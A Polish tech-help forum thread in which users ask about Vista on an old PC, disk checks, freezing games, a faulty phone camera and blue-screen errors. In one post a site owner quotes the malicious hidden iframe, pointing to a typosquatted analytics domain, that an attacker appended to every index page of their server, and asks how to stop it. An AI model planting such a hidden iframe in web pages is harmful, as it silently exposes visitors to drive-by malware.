Skocz do zawartości

VALHALLA TO NIE OFICJALNA POMOC TECHNICZNA


Patrysław

Rekomendowane odpowiedzi

  • Odpowiedzi 508
  • Dodano
  • Ostatniej odpowiedzi

Top użytkownicy w tym temacie

Top użytkownicy w tym temacie

@gorefest: Ta wersja PhoneXS'a nie obsługuje K550 ;P

 

Teraz moje pytanie: Czy komputer z takim specyficznym wyposażeniem:

Pentium IV 2,4 GhZ

512 MB RAM

ASUS Radeon HD2600XT 512MB

 

udźwignie Vistę Ultimate?? (tzn. nie Aero ale w ogóle czy się da uruchomić bez mulenia takiego, że notatnika się nie da otworzyć) (planuję w najbliższym czasie kupić 2GB RAM)

Bo niby wymagania 1,2 GhZ i 512MB RAM, no ale... wiadomo :) Microsoft.

Odnośnik do komentarza
Udostępnij na innych stronach

1.chkdsk E: /f

 

2.Jeśli się spyta : Y

 

3.Pozwól go sprawdzić

 

4.Nie powinno być problemów, sam tak miałem i pomogło :D

 

Może się zdarzyć, że trzeba będzie wykonać sprawdzanie dysku po ponownych uruchomieniu komputera podczas uruchamiania systemu.

 

Jeśli to nie pomoże to niestety nie wiem co dalej. Mi pomogło, bo miałem ten sam problem :)

Odnośnik do komentarza
Udostępnij na innych stronach

Spróbuję to zrobić ale może kiedy indziej, bo trwa to chyba z godzinę...

 

Ale przy okazji - mam inny, o wiele bardziej uciążliwy problem. Otóż od pewnego czasu niektóre gry zawieszają się podczas grania (razem z systemem, po prostu taka stop-klatka, a muzyka się zapętla i zniekształca). Najdziwniejsze jest to, że czasem po 2 minutach grania a czasami po 2 godzinach. Wstępuje to w grach: Spellforce 2, Heroes V z dodatkami, Guild Wars, Dark Messiah of might and magic. Zaś nie występuje m. in. w Puzzle Quest, XIII, Warlords Battlecry (III i II), Team Fortress 2, Half-life (+dodatki i deathmatch), Portal. Pisałem z gościem od obsługi technicznej w sprawie Heroesów bo to od nich się zaczęło. Zrobiłem wszystko co mi powiedział: przepuściłem mocnym benchmarkiem, uruchomiłem w trybie czystego bootowania, przeinstalowałem, zainstalowałem starsze, jeszcze raz zainstalowałem nowsze sterowniki, sprawdziłem pamięć... Nic nie dało efektu. Może jeszcze jakieś pomysły? Niestety format odpada przez jeszcze przynajmniej miesiąc...

Odnośnik do komentarza
Udostępnij na innych stronach

Nigdy nie chcialem musiec miec problemu i opisac go w tym temacie, ale musze choc nie chem,

Moj SE W200i zaczyna mnie wnerwiac, coraz czesciej robi o takie zdjecia:

971tv9.jpg

Najgorsze w tym jest to, ze czasami cos ladnie sie ulozy, albo robie zdjecie z okna samochodu, a ten mi na zlosc wywala takie zdjecie.

What should I do? Wiem ze moge pojsc do Argosa, i zareklamowac, ale z lenistwa mi sie nie chce

Odnośnik do komentarza
Udostępnij na innych stronach

Nigdy nie chcialem musiec miec problemu i opisac go w tym temacie, ale musze choc nie chem,

Moj SE W200i zaczyna mnie wnerwiac, coraz czesciej robi o takie zdjecia:

971tv9.jpg

Najgorsze w tym jest to, ze czasami cos ladnie sie ulozy, albo robie zdjecie z okna samochodu, a ten mi na zlosc wywala takie zdjecie.

What should I do? Wiem ze moge pojsc do Argosa, i zareklamowac, ale z lenistwa mi sie nie chce

Masz zalany/popsuty aparat. Kup se nowy, chodzą po 250-300zł :)

Odnośnik do komentarza
Udostępnij na innych stronach

  • 1 miesiąc temu...

mam problem z serwerem otóż cały czas wbija mi sie jakiś bot na niego i nie wiem co z tym zrobić

ESET rozpoznaje go jako JS/Kryptik.b, zmieniłem hasło ale to nie pomogło

próbowałem zabezpieczyć serwer przez .htaccess ale nie działa

Deny from 193.189.116.3
Options -Indexes

 

w dodatku do kazdego pliku index dodawany jest na koncu strony kod

<iframe src="http://google-ana1yticz.com/?click=3855E" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

zamieszczam loga może kogoś to naprowadzi co zrobić

http://mjut.pl/mjut.pl-08-02-2009.log

 

pomóżcie panowie bo nie wiem co z tym zrobić :crying:

Odnośnik do komentarza
Udostępnij na innych stronach

Ale przy okazji - mam inny, o wiele bardziej uciążliwy problem. Otóż od pewnego czasu niektóre gry zawieszają się podczas grania (razem z systemem, po prostu taka stop-klatka, a muzyka się zapętla i zniekształca). Najdziwniejsze jest to, że czasem po 2 minutach grania a czasami po 2 godzinach. Wstępuje to w grach: Spellforce 2, Heroes V z dodatkami, Guild Wars, Dark Messiah of might and magic. Zaś nie występuje m. in. w Puzzle Quest, XIII, Warlords Battlecry (III i II), Team Fortress 2, Half-life (+dodatki i deathmatch), Portal. Pisałem z gościem od obsługi technicznej w sprawie Heroesów bo to od nich się zaczęło. Zrobiłem wszystko co mi powiedział: przepuściłem mocnym benchmarkiem, uruchomiłem w trybie czystego bootowania, przeinstalowałem, zainstalowałem starsze, jeszcze raz zainstalowałem nowsze sterowniki, sprawdziłem pamięć... Nic nie dało efektu. Może jeszcze jakieś pomysły? Niestety format odpada przez jeszcze przynajmniej miesiąc...

Też kiedyś miałem taki problem podczas grania się gry zawieszały i już nawet niczym nie mogłem wyłączyć, jak by się procesor zatrzymał. Teraz mam nowy sprzęcik i wszystko jest OK, ale nie wiem co było tego przyczyną w tamtym kompie.

Odnośnik do komentarza
Udostępnij na innych stronach

Mam problem. Jakiś miesiąc temu kupiłem nową kartę graficzną(ATI RADEON 3870) i zformatowałem system. Zainstalowałem wszystkie sterowniki i git. Ale po jakiś 2 tygodniach zaczął się pojawiać komunikat błędu STOP. Po prostu nagle i znienacka wyświetla się niebieskie tło z białym napisem pełnym krzaczków zamiast polskich liter. Pisze tam, że wystąpił błąd STOP i cośtam o sprawdzeniu nowo zainstalowanego sprzętu i oprogramowania. Sprawdzałem wszystkie kabelki i w ogóle, ale wszystko jest podłączone prawidłowo. Karta wymaga minimum 450 W, jednak gość w sklepie powiedział, że kiedy używał ten model, 400 wystarczyło(mam zainstalowane te 400).

Odnośnik do komentarza
Udostępnij na innych stronach

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.

×
×
  • Dodaj nową pozycję...